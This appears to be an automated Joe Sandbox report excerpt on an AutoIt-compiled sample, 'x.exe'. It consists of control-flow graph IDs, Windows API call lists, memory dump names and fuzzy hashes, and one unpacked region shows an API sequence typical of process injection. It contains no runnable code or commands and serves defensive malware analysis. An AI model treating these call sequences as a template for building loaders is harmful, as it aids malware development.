                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                    • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                    • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1329 4115d7-4115df 1330 4115ee-4115f9 call 4135bb 1329->1330 1333 4115e1-4115ec call 411988 1330->1333 1334 4115fb-4115fc 1330->1334 1333->1330 1337 4115fd-41160e 1333->1337 1338 411610-41163b call 417fc0 call 41130a 1337->1338 1339 41163c-411656 call 4180af call 418105 1337->1339 1338->1339
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 004115F1
                                                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                    • String ID: ,*H$4*H$@fI
                                                                                                                                                    • API String ID: 615853336-1459471987
                                                                                                                                                    • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                                                    • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1348 2f32610-2f326be call 2f30000 1351 2f326c5-2f326eb call 2f33520 CreateFileW 1348->1351 1354 2f326f2-2f32702 1351->1354 1355 2f326ed 1351->1355 1363 2f32704 1354->1363 1364 2f32709-2f32723 VirtualAlloc 1354->1364 1356 2f3283d-2f32841 1355->1356 1357 2f32883-2f32886 1356->1357 1358 2f32843-2f32847 1356->1358 1360 2f32889-2f32890 1357->1360 1361 2f32853-2f32857 1358->1361 1362 2f32849-2f3284c 1358->1362 1365 2f32892-2f3289d 1360->1365 1366 2f328e5-2f328fa 1360->1366 1367 2f32867-2f3286b 1361->1367 1368 2f32859-2f32863 1361->1368 1362->1361 1363->1356 1369 2f32725 1364->1369 1370 2f3272a-2f32741 ReadFile 1364->1370 1371 2f328a1-2f328ad 1365->1371 1372 2f3289f 1365->1372 1373 2f3290a-2f32912 1366->1373 1374 2f328fc-2f32907 VirtualFree 1366->1374 1375 2f3287b 1367->1375 1376 2f3286d-2f32877 1367->1376 1368->1367 1369->1356 1377 2f32743 1370->1377 1378 2f32748-2f32788 VirtualAlloc 1370->1378 1381 2f328c1-2f328cd 1371->1381 1382 2f328af-2f328bf 1371->1382 1372->1366 1374->1373 1375->1357 1376->1375 1377->1356 1379 2f3278a 1378->1379 1380 2f3278f-2f327aa call 2f33770 1378->1380 1379->1356 1388 2f327b5-2f327bf 1380->1388 1385 2f328da-2f328e0 1381->1385 1386 2f328cf-2f328d8 1381->1386 1384 2f328e3 1382->1384 1384->1360 1385->1384 1386->1384 1389 2f327f2-2f32806 call 2f33580 1388->1389 1390 2f327c1-2f327f0 call 2f33770 1388->1390 1396 2f3280a-2f3280e 1389->1396 1397 2f32808 1389->1397 1390->1388 1398 2f32810-2f32814 CloseHandle 1396->1398 1399 2f3281a-2f3281e 1396->1399 1397->1356 1398->1399 1400 2f32820-2f3282b VirtualFree 1399->1400 1401 2f3282e-2f32837 1399->1401 1400->1401 1401->1351 1401->1356
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02F326E1
                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02F32907
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                                    • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                                    • Instruction ID: 9c5e02f828dadad807bf01ce1a14705925e7c01fa121adf7fc8b2852f7d58bf4
                                                                                                                                                    • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                                    • Instruction Fuzzy Hash: 33A1F575E00209EBDB15CFA4C894BEEBBB5BF48304F208159EA05BB280D7799E45CF94

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1402 4102b0-4102c5 SHGetMalloc 1403 4102cb-4102da SHGetDesktopFolder 1402->1403 1404 425dfd-425e0e call 433244 1402->1404 1405 4102e0-41031a call 412fba 1403->1405 1406 41036b-410379 1403->1406 1414 410360-410368 1405->1414 1415 41031c-410331 SHGetPathFromIDListW 1405->1415 1406->1404 1412 41037f-410384 1406->1412 1414->1406 1416 410351-41035d 1415->1416 1417 410333-41034a call 412fba 1415->1417 1416->1414 1417->1416
                                                                                                                                                    APIs
                                                                                                                                                    • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _wcsncpy$DesktopFolderFromListMallocPath
• String ID: C:\Users\user\AppData\Local\Temp\x.exe
• API String ID: 3170942423-4011630074
• Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
• Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
• RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: b71d51f64b70c65a21aacfd12bd9f8cd1a00b42160e05dfef4e297133c897f40
• Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
• Opcode Fuzzy Hash: b71d51f64b70c65a21aacfd12bd9f8cd1a00b42160e05dfef4e297133c897f40
• Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
• ShowWindow.USER32(?,00000000), ref: 004105E4
• ShowWindow.USER32(?,00000000), ref: 004105EE
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
• Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
APIs
  • Part of subcall function 02F322A0: Sleep.KERNELBASE(000001F4), ref: 02F322B1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02F324FE
Strings
Memory Dump Source
• Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2f30000_x.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: SM4Z9FOQEF1ZZPDUEU2RMXUVU
• API String ID: 2694422964-3505261392
• Opcode ID: d5dda39f6aa291efd1d644d37283f649798babdcb4b4f800bf8a5c245906504b
• Instruction ID: b4b40032cbb9c462d3a5287e77461290016638c5549452988aa3480bb956fde1
• Opcode Fuzzy Hash: d5dda39f6aa291efd1d644d37283f649798babdcb4b4f800bf8a5c245906504b
• Instruction Fuzzy Hash: A2619F31D04288DAEF11DBA4C854BEFBB75AF19301F044198E658BB2C1D7BA1B49CB66
APIs
• RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
• RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
• RegCloseKey.KERNELBASE(?), ref: 0040F2B5
• RegCloseKey.ADVAPI32(?), ref: 0040F2C9
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Close$OpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 1607946009-824357125
• Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
• Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID:
• String ID: Wu
• API String ID: 0-4083010176
• Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
• Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
• Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
• Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
APIs
• GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
• TerminateProcess.KERNEL32(00000000), ref: 004753CE
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Process$CurrentTerminate
• String ID: Wu
• API String ID: 2429186680-4083010176
• Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
• Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
• Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
• Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 02F31ACD
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02F31AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F31B13
Memory Dump Source
• Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2f30000_x.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
• Instruction ID: 7067b96c131a1fc9fa25b4d3f5a42d858ff5241265b682332fea7f02f0b358bc
• Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
• Instruction Fuzzy Hash: 11620C30A14258DBEB25CFA4C850BDEB376EF58340F1091A9D20DEB394E7769E81CB59
APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2782032738-0
                                                                                                                                                    • Opcode ID: fb16396c4888a36c6042d732b94f2f162be42afe05c4db1d89babc72b21305f5
                                                                                                                                                    • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                                                    • Opcode Fuzzy Hash: fb16396c4888a36c6042d732b94f2f162be42afe05c4db1d89babc72b21305f5
                                                                                                                                                    • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                                                    • _free.LIBCMT ref: 004295A0
                                                                                                                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                    • API String ID: 3938964917-3305491385
                                                                                                                                                    • Opcode ID: 371c3dc2c4912be8d8a4f7f9b0d0a9966ce2b3ac88618a8788b134274be20d2a
                                                                                                                                                    • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                                                    • Opcode Fuzzy Hash: 371c3dc2c4912be8d8a4f7f9b0d0a9966ce2b3ac88618a8788b134274be20d2a
                                                                                                                                                    • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: Error:
                                                                                                                                                    • API String ID: 4104443479-232661952
                                                                                                                                                    • Opcode ID: 86678f6fbf30c96828b7bd75d44360d673c824b059c9aa0e8d292ec67add6943
                                                                                                                                                    • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                                                    • Opcode Fuzzy Hash: 86678f6fbf30c96828b7bd75d44360d673c824b059c9aa0e8d292ec67add6943
                                                                                                                                                    • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                                                    APIs
                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\x.exe,0040F545,C:\Users\user\AppData\Local\Temp\x.exe,004A90E8,C:\Users\user\AppData\Local\Temp\x.exe,?,0040F545), ref: 0041013C
                                                                                                                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
